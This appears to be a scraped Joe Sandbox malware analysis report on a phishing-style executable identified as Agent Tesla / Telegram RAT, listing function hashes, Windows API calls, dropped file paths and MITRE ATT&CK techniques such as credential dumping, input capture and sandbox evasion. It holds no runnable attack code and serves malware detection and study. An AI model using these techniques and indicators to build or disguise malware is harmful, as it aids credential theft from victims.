API String ID: 2063062207-1426578954
Opcode ID: 0302bc91f91af807f0268f0d3f4d434a2d4e47d20cce67a6edfea9f25c8fe3f7
Instruction ID: ab601fe209d4c9dc7fd16a263ee63122fab2669dc0208a748199ca639e1bf448
Opcode Fuzzy Hash: 0302bc91f91af807f0268f0d3f4d434a2d4e47d20cce67a6edfea9f25c8fe3f7
Instruction Fuzzy Hash: 985155B4D016498FDB10CFA9D688BDEBBF0AF48308F248599E019B7394CB349948CF65

Uniqueness

Uniqueness Score: -1.00%

Function 02C0BAD0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 02C0BB30
GetCurrentThread.KERNEL32 ref: 02C0BB6D
GetCurrentProcess.KERNEL32 ref: 02C0BBAA
GetCurrentThreadId.KERNEL32 ref: 02C0BC03

Strings

hv, xrefs: 02C0BC2F

Memory Dump Source

Source File: 00000005.00000002.398151170.0000000002C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2c00000_WsdnBq.jbxd

Similarity

API ID: Current$ProcessThread
String ID: hv
API String ID: 2063062207-1426578954
Opcode ID: 827aa47e74c4006baa757574db632842c58a68e80e788deaa88cf18ca859ef11
Instruction ID: ab35d5a8f8eab5eebeecf7429d0df6b616807e15fca805a7d5d98602b016cbf6
Opcode Fuzzy Hash: 827aa47e74c4006baa757574db632842c58a68e80e788deaa88cf18ca859ef11
Instruction Fuzzy Hash: D55144B0D006498FDB14CFAAC588B9EBBF0BB48318F248599E019B7394CB74A944CF65

Uniqueness

Uniqueness Score: -1.00%

Function 02C097E8 Relevance: 1.7, APIs: 1, Instructions: 192
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02C09A2E

Memory Dump Source

Source File: 00000005.00000002.398151170.0000000002C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2c00000_WsdnBq.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 42c77345fa725d137803977a139ef718ed121962ce28c688f1961f7a58fa1246
Instruction ID: a9c437b32e0b282177cb44f37611b74f9180b96dfc0fc305d3f43f4c34f914b2
Opcode Fuzzy Hash: 42c77345fa725d137803977a139ef718ed121962ce28c688f1961f7a58fa1246
Instruction Fuzzy Hash: CD7123B0A00B058FDB24DF2AC48475AB7F1BF88604F048A2DD58AD7B80DB35E949CF95

Uniqueness

Uniqueness Score: -1.00%

Function 02C0C0F8 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02C0C187

Memory Dump Source

Source File: 00000005.00000002.398151170.0000000002C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2c00000_WsdnBq.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 50c8a0f551bfc5465c8e3925615eb941729da952ced6d97a2ed0e411445378a3
Instruction ID: 0ab4d986c82e91d5568577f7856243c602705d131970a6e06da2325c7101398d
Opcode Fuzzy Hash: 50c8a0f551bfc5465c8e3925615eb941729da952ced6d97a2ed0e411445378a3
Instruction Fuzzy Hash: 8C21E2B6D002099FDB10CFA9D984AEEFBF4EB58324F14841AE915B7750D374AA44CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02C0C100 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02C0C187

Memory Dump Source

Source File: 00000005.00000002.398151170.0000000002C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2c00000_WsdnBq.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 7f077fa278b6bd2a3ef9c549813ea127f90eea015f4e43f5b6afa60659613616
Instruction ID: 4be8f9c2424830241a74db8535f6884a8734a8ee60f69a645c299dd466045808
Opcode Fuzzy Hash: 7f077fa278b6bd2a3ef9c549813ea127f90eea015f4e43f5b6afa60659613616
Instruction Fuzzy Hash: 4D21D5B5D002099FDB10CFAAD984ADEFBF4FB58324F14841AE915A7350D374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02C08B90 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02C09AA9,00000800,00000000,00000000), ref: 02C09CBA

Memory Dump Source

Source File: 00000005.00000002.398151170.0000000002C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2c00000_WsdnBq.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 2701f1e0914c8e20fe22d132a48ded5849f437ce9cabc909697917a3e500cd97
Instruction ID: 83d1a831435629b078a15e0ab734dd5033b2010b777cd12766d7692a9cfe6156
Opcode Fuzzy Hash: 2701f1e0914c8e20fe22d132a48ded5849f437ce9cabc909697917a3e500cd97
Instruction Fuzzy Hash: 5F1100B6D002098FCB10CF9AC488BDEFBF4EB88724F04842EE519A7640C375A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02C09C49 Relevance: 1.6, APIs: 1, Instructions: 51
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02C09AA9,00000800,00000000,00000000), ref: 02C09CBA

Memory Dump Source

Source File: 00000005.00000002.398151170.0000000002C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2c00000_WsdnBq.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 3bd5496e3da1df33b0af2ce4654aa54fee32282bc3f75a950d337551f1cf50b9
Instruction ID: 3c28b4b988d527dc9b1f6579da4d039719556919bb3c0eeea5bb65c9c58ebcf8
Opcode Fuzzy Hash: 3bd5496e3da1df33b0af2ce4654aa54fee32282bc3f75a950d337551f1cf50b9
Instruction Fuzzy Hash: F71100B6D002098FCB10CFAAC588BDEBBF4AB88224F05842ED515A7640C375A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02C099C8 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02C09A2E

Memory Dump Source

Source File: 00000005.00000002.398151170.0000000002C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2c00000_WsdnBq.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 6dee1d6c8805a3ce139ae96a879a6c1f2807fcf7678a8e3bc087453f4bdcf191
Instruction ID: 77dfdc7ed601216220a1d8b550ea72f4efa1f1e6681a91de8ca3c0f577b52f7c
Opcode Fuzzy Hash: 6dee1d6c8805a3ce139ae96a879a6c1f2807fcf7678a8e3bc087453f4bdcf191
Instruction Fuzzy Hash: 9311E0B6D002498FCB10CF9AD488BDEFBF4EB88624F14841AD429B7640C374A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0E820040 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.420757730.000000000E820000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e820000_WsdnBq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18d67805a802e57d1e67b766be419d89ef4ab7f82970ef50d6898cf3a462a9e7
Instruction ID: eee131972058ab6e1b4262a85a79ac6ce14b63f10c494027f6bc5a27d4f6c111
Opcode Fuzzy Hash: 18d67805a802e57d1e67b766be419d89ef4ab7f82970ef50d6898cf3a462a9e7
Instruction Fuzzy Hash: 4991D434B112148FCB59DBB8D498AADB7B2BF89305F1580A9E915EB3A1DB31DC41CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0128D3B4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.397047888.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_128d000_WsdnBq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecce6c806f75dbf23d12ffa5e8fd2767cff11f60244fabc9fd06f66e2ac49b70
Instruction ID: bb705a2f073844a9c62ba7ed86d9ce7c7d9a6a26e2fe2fb275a191bf84be5de3
Opcode Fuzzy Hash: ecce6c806f75dbf23d12ffa5e8fd2767cff11f60244fabc9fd06f66e2ac49b70
Instruction Fuzzy Hash: F22136B1515248DFDB05EF58D8C0F66BF61FB84324F24C568E9054B2C7C336E84ACAA1

Uniqueness

Uniqueness Score: -1.00%

Function 0129D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.397085332.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_129d000_WsdnBq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80e50d1ba0eed9a9878c83d28208d54e88514f21fc5820014b7cd8fcfba7fe7f
Instruction ID: 35d995a6b88e188d51c6b1d94ea9504a1342ae0289178509b87194c19cd9bc36
Opcode Fuzzy Hash: 80e50d1ba0eed9a9878c83d28208d54e88514f21fc5820014b7cd8fcfba7fe7f
Instruction Fuzzy Hash: 1A213771514248DFDF15CF68D8C4B26BB61FB84364F24C96DD90A4B246C377D807DAA1

Uniqueness

Uniqueness Score: -1.00%

Function 0129D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.397085332.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_129d000_WsdnBq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7033eacd088f9b486a95f4a4ebec744cfd432a7a93889c370333ffc239b7f698
Instruction ID: e15a3575863f3b1a06120a4781c0200d1b02ade0e36639d77bdd8cd29d9454da
Opcode Fuzzy Hash: 7033eacd088f9b486a95f4a4ebec744cfd432a7a93889c370333ffc239b7f698
Instruction Fuzzy Hash: 372137B1914208EFDF05CF98D9C0B26BB61FB84324F24C5ADD9094B247C376D806DA61

Uniqueness

Uniqueness Score: -1.00%

Function 0128D3AF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.397047888.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_128d000_WsdnBq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b01dbe77e2c3cd66bc07cf43a9009412fedb9933ae9a5b24d5daa3bf84f2184
Instruction ID: a8296bc35b8fa5388c929874031874eb8c400ad08431ca493fa4605bfcbf10ad
Opcode Fuzzy Hash: 2b01dbe77e2c3cd66bc07cf43a9009412fedb9933ae9a5b24d5daa3bf84f2184
Instruction Fuzzy Hash: 4C110376404284CFCB02CF58D9C4B56BF71FB84324F28C6A9D9050B697C336E45ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0129D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.397085332.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_129d000_WsdnBq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e55b3f513a11ffc40ca7a7ca10c57596e5d9ae86271ca5b0fc8243175068e834
Instruction ID: df428e7a0feea586bb1cf99463c2cb9c990ed2cd6356ccd8ce58ac6559408961
Opcode Fuzzy Hash: e55b3f513a11ffc40ca7a7ca10c57596e5d9ae86271ca5b0fc8243175068e834
Instruction Fuzzy Hash: 9611BB75904284DFDF02CF58C5C4B15BBB1FB84224F28C6ADD9494B697C33AD44ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 0129D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.397085332.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_129d000_WsdnBq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e55b3f513a11ffc40ca7a7ca10c57596e5d9ae86271ca5b0fc8243175068e834
Instruction ID: a1ff622a856abece7dcf6069043502ed422e8926fe0d34955e5523beb4c2f297
Opcode Fuzzy Hash: e55b3f513a11ffc40ca7a7ca10c57596e5d9ae86271ca5b0fc8243175068e834
Instruction Fuzzy Hash: 7E11BE75504284CFDB12CF58D5C4B15BB61FB44314F28C6ADD9094B656C33AD44ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0128D745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.397047888.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_128d000_WsdnBq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8d2014c9e10742c54ac03b7cf104b189ce8af511756e00a2887303f8fd614f8
Instruction ID: 821d6d17e8e01ef123e7128901a03146a0b240e2d5e4b38ec92bdc39c75bd678
Opcode Fuzzy Hash: e8d2014c9e10742c54ac03b7cf104b189ce8af511756e00a2887303f8fd614f8
Instruction Fuzzy Hash: DE01FC715193C89AE714BE56CDC4B66BF98EF41274F08851EEB045F2C7C7789848C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 0128D744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.397047888.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_128d000_WsdnBq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 491ca2cc7d7aa6346885b924ad1c838e3dff25edfe4164b7f73d594e4cb04a32
Instruction ID: 665700e1b6f260677a2cb67afa00c739ac930dde2b1e41b3f56f665565f52404
Opcode Fuzzy Hash: 491ca2cc7d7aa6346885b924ad1c838e3dff25edfe4164b7f73d594e4cb04a32
Instruction Fuzzy Hash: 5DF0C8714053889AE7149E59CC88B62FF98DB41674F18C05AEE045B6C6C3789844CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 0E8202F0 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.420757730.000000000E820000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e820000_WsdnBq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 336d1cd384e5b36de5d9123ee611e0a1aeda8e1e4124a52c1ee8c27d3828dd3d
Instruction ID: bcccc318597f0770103c4e87fe6dca6fd820cbf2d15d2599c93d0fea579b5bd3
Opcode Fuzzy Hash: 336d1cd384e5b36de5d9123ee611e0a1aeda8e1e4124a52c1ee8c27d3828dd3d
Instruction Fuzzy Hash: 02C01236A0412E8ACF108BA5F4046ECBBB0EB8922AF104066D129B2244C3340A989BA1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ORDER (6256 OS)#391 PI.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Telegram RAT

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Persistence and Installation Behavior

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ORDER (6256 OS)#391 PI.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\WsdnBq.exe.log

C:\Users\user\AppData\Local\Temp\tmp645E.tmp

C:\Users\user\AppData\Local\Temp\tmpF47D.tmp

C:\Users\user\AppData\Roaming\WsdnBq.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Windows Analysis Report
ORDER (6256 OS)#391 PI.exe

Function 0799B710 Relevance: 2.7, Strings: 2, Instructions: 204
COMMON

Function 07998BB0 Relevance: 1.6, Strings: 1, Instructions: 332
COMMON

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network protocol analysis, Packet capture, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre